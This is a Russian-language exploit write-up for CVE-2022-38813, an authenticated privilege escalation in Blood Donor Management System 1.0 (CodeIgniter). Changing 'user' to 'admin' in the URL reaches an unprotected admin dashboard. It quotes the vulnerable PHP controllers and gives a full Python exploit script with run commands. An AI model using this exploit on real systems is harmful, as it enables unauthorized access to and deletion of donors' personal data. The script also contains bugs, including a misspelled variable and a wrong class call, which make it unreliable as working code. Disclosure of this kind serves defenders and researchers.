
Уязвимость аутентифицированного вертикального повышения привилегий в системе управления донорами крови
Повышение привилегий через параметр user в Blood Donor Management System на базе Codeigniter v 1.0

Blood Donor Management System 1.0 не ограничивает должным образом доступ к admin/dashboard.php, что позволяет злоумышленникам получать доступ ко всем данным пользователей, удалять пользователей, добавлять и управлять группами крови, а также отправлять отчеты.
в следующем исходном коде мы видим, что user/dashboard не ограничивает должным образом параметры пользователя, поэтому злоумышленник может изменить этот параметр на admin и получить доступ к учетной записи администратора.
Уязвимая страница - Dashboard.php в User и Dashboard.php в Admin
// Dashboard.php in User
class Dashboard extends CI_Controller
{
//Validating login
function __construct()
{
parent::__construct();
if (!$this->session->userdata('uid'))
redirect('user/login');
}
public function index()
{
$this->load->view('user/dashboard');
}
}
// Dashboard.php в Admin
<?php
defined('BASEPATH') or exit('No direct script access allowed');
class Dashboard extends CI_Controller
{
public function index()
{
$this->load->model('admin/Dashboard_Model', 'adminn');
$totalusercount = $this->adminn->totalusercount();
$totalbloodgroupcount = $this->adminn->totalbloodgroupcount();
$this->load->view('admin/dashboard', ['totalusercount' => $totalusercount, 'totalbloodgroupcount' => $totalbloodgroupcount]);
}
}
import argparse
import requests
from termcolor import cprint
import sys
from bs4 import *
color = "green"
cprint("[+] CVE-2022-38813 Authenticated Privilege Escalation in Blood Donor Management System v1.0", color)
cprint("[+] Author: RashidKhan Pathan aka iHexCoder", color)
cprint("[!] Usage: run exploit.py username password payload", color)
cprint("[!] Example: python3 exploit.py admin [email protected] Test@123", color)
class PrivilegeEscalation:
color = "green"
def __init__(self, username, password, payload):
self.username = username
self.password = password
self.paylaod = payload
def authentication(self):
color = "green"
cprint("[+] Authenticating User", color)
cprint("[+] Username: " + args.username, color)
cprint("[+] Password: " + args.password, color)
cprint("[+] Payload: " + args.payload, color)
login_url = "http://localhost/blood/user/login"
data = {
"email": args.username,
"password": args.password
}
login_response = requests.post(login_url, data=data)
cprint("[+] Exploiting...Started", color)
if "/user/login" in login_response.url:
cprint("[+] Credentials is not Valid", "red")
sys.exit(1)
else:
cprint("[+] Authenticated Successfully as a Normal User ", color)
cprint("[+] Normal User URL Endpoint " + login_response.url, color)
url = args.payload
if args.payload != "admin":
cprint("[+] Please Add Valid Payload", "red")
sys.exit(1)
response = requests.get(f"http://localhost/blood/{url}/dashboard")
cprint("[+] Exploit Compleated", color)
cprint("[+] Accessed Admin Panel Successfully " + response.url, color)
cprint("[+] Copy the URL and Replace with user/dashboard URL with " + esponse.url, color)
cprint("[+] After Replacing it You Should see the Bypassed Admin Panel", color)
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("username", help="Please Add Username", type=str)
parser.add_argument("password", help="Please Add Password", type=str)
parser.add_argument("payload", help="Please Add Password", type=str)
args = parser.parse_args()
privilegeEscalation = PrivilegeEscalation
privilegeEscalation.authentication((args.username, args.password, args.payload))
# Измените уязвимый параметр user в URL, чтобы повысить привилегии обычного пользователя до admin -
python3 CVE-2022-38813.py <username> <password> <payload>
python CVE-2022-38813.py [email protected] Test@123 admin

Ссылка на ПО: https://phpgurukul.com/blood-donor-management-system-using-codeigniter
RashidKhan Pathan (iHexCoder), 9 сентября 2022. Twitter: @itRashid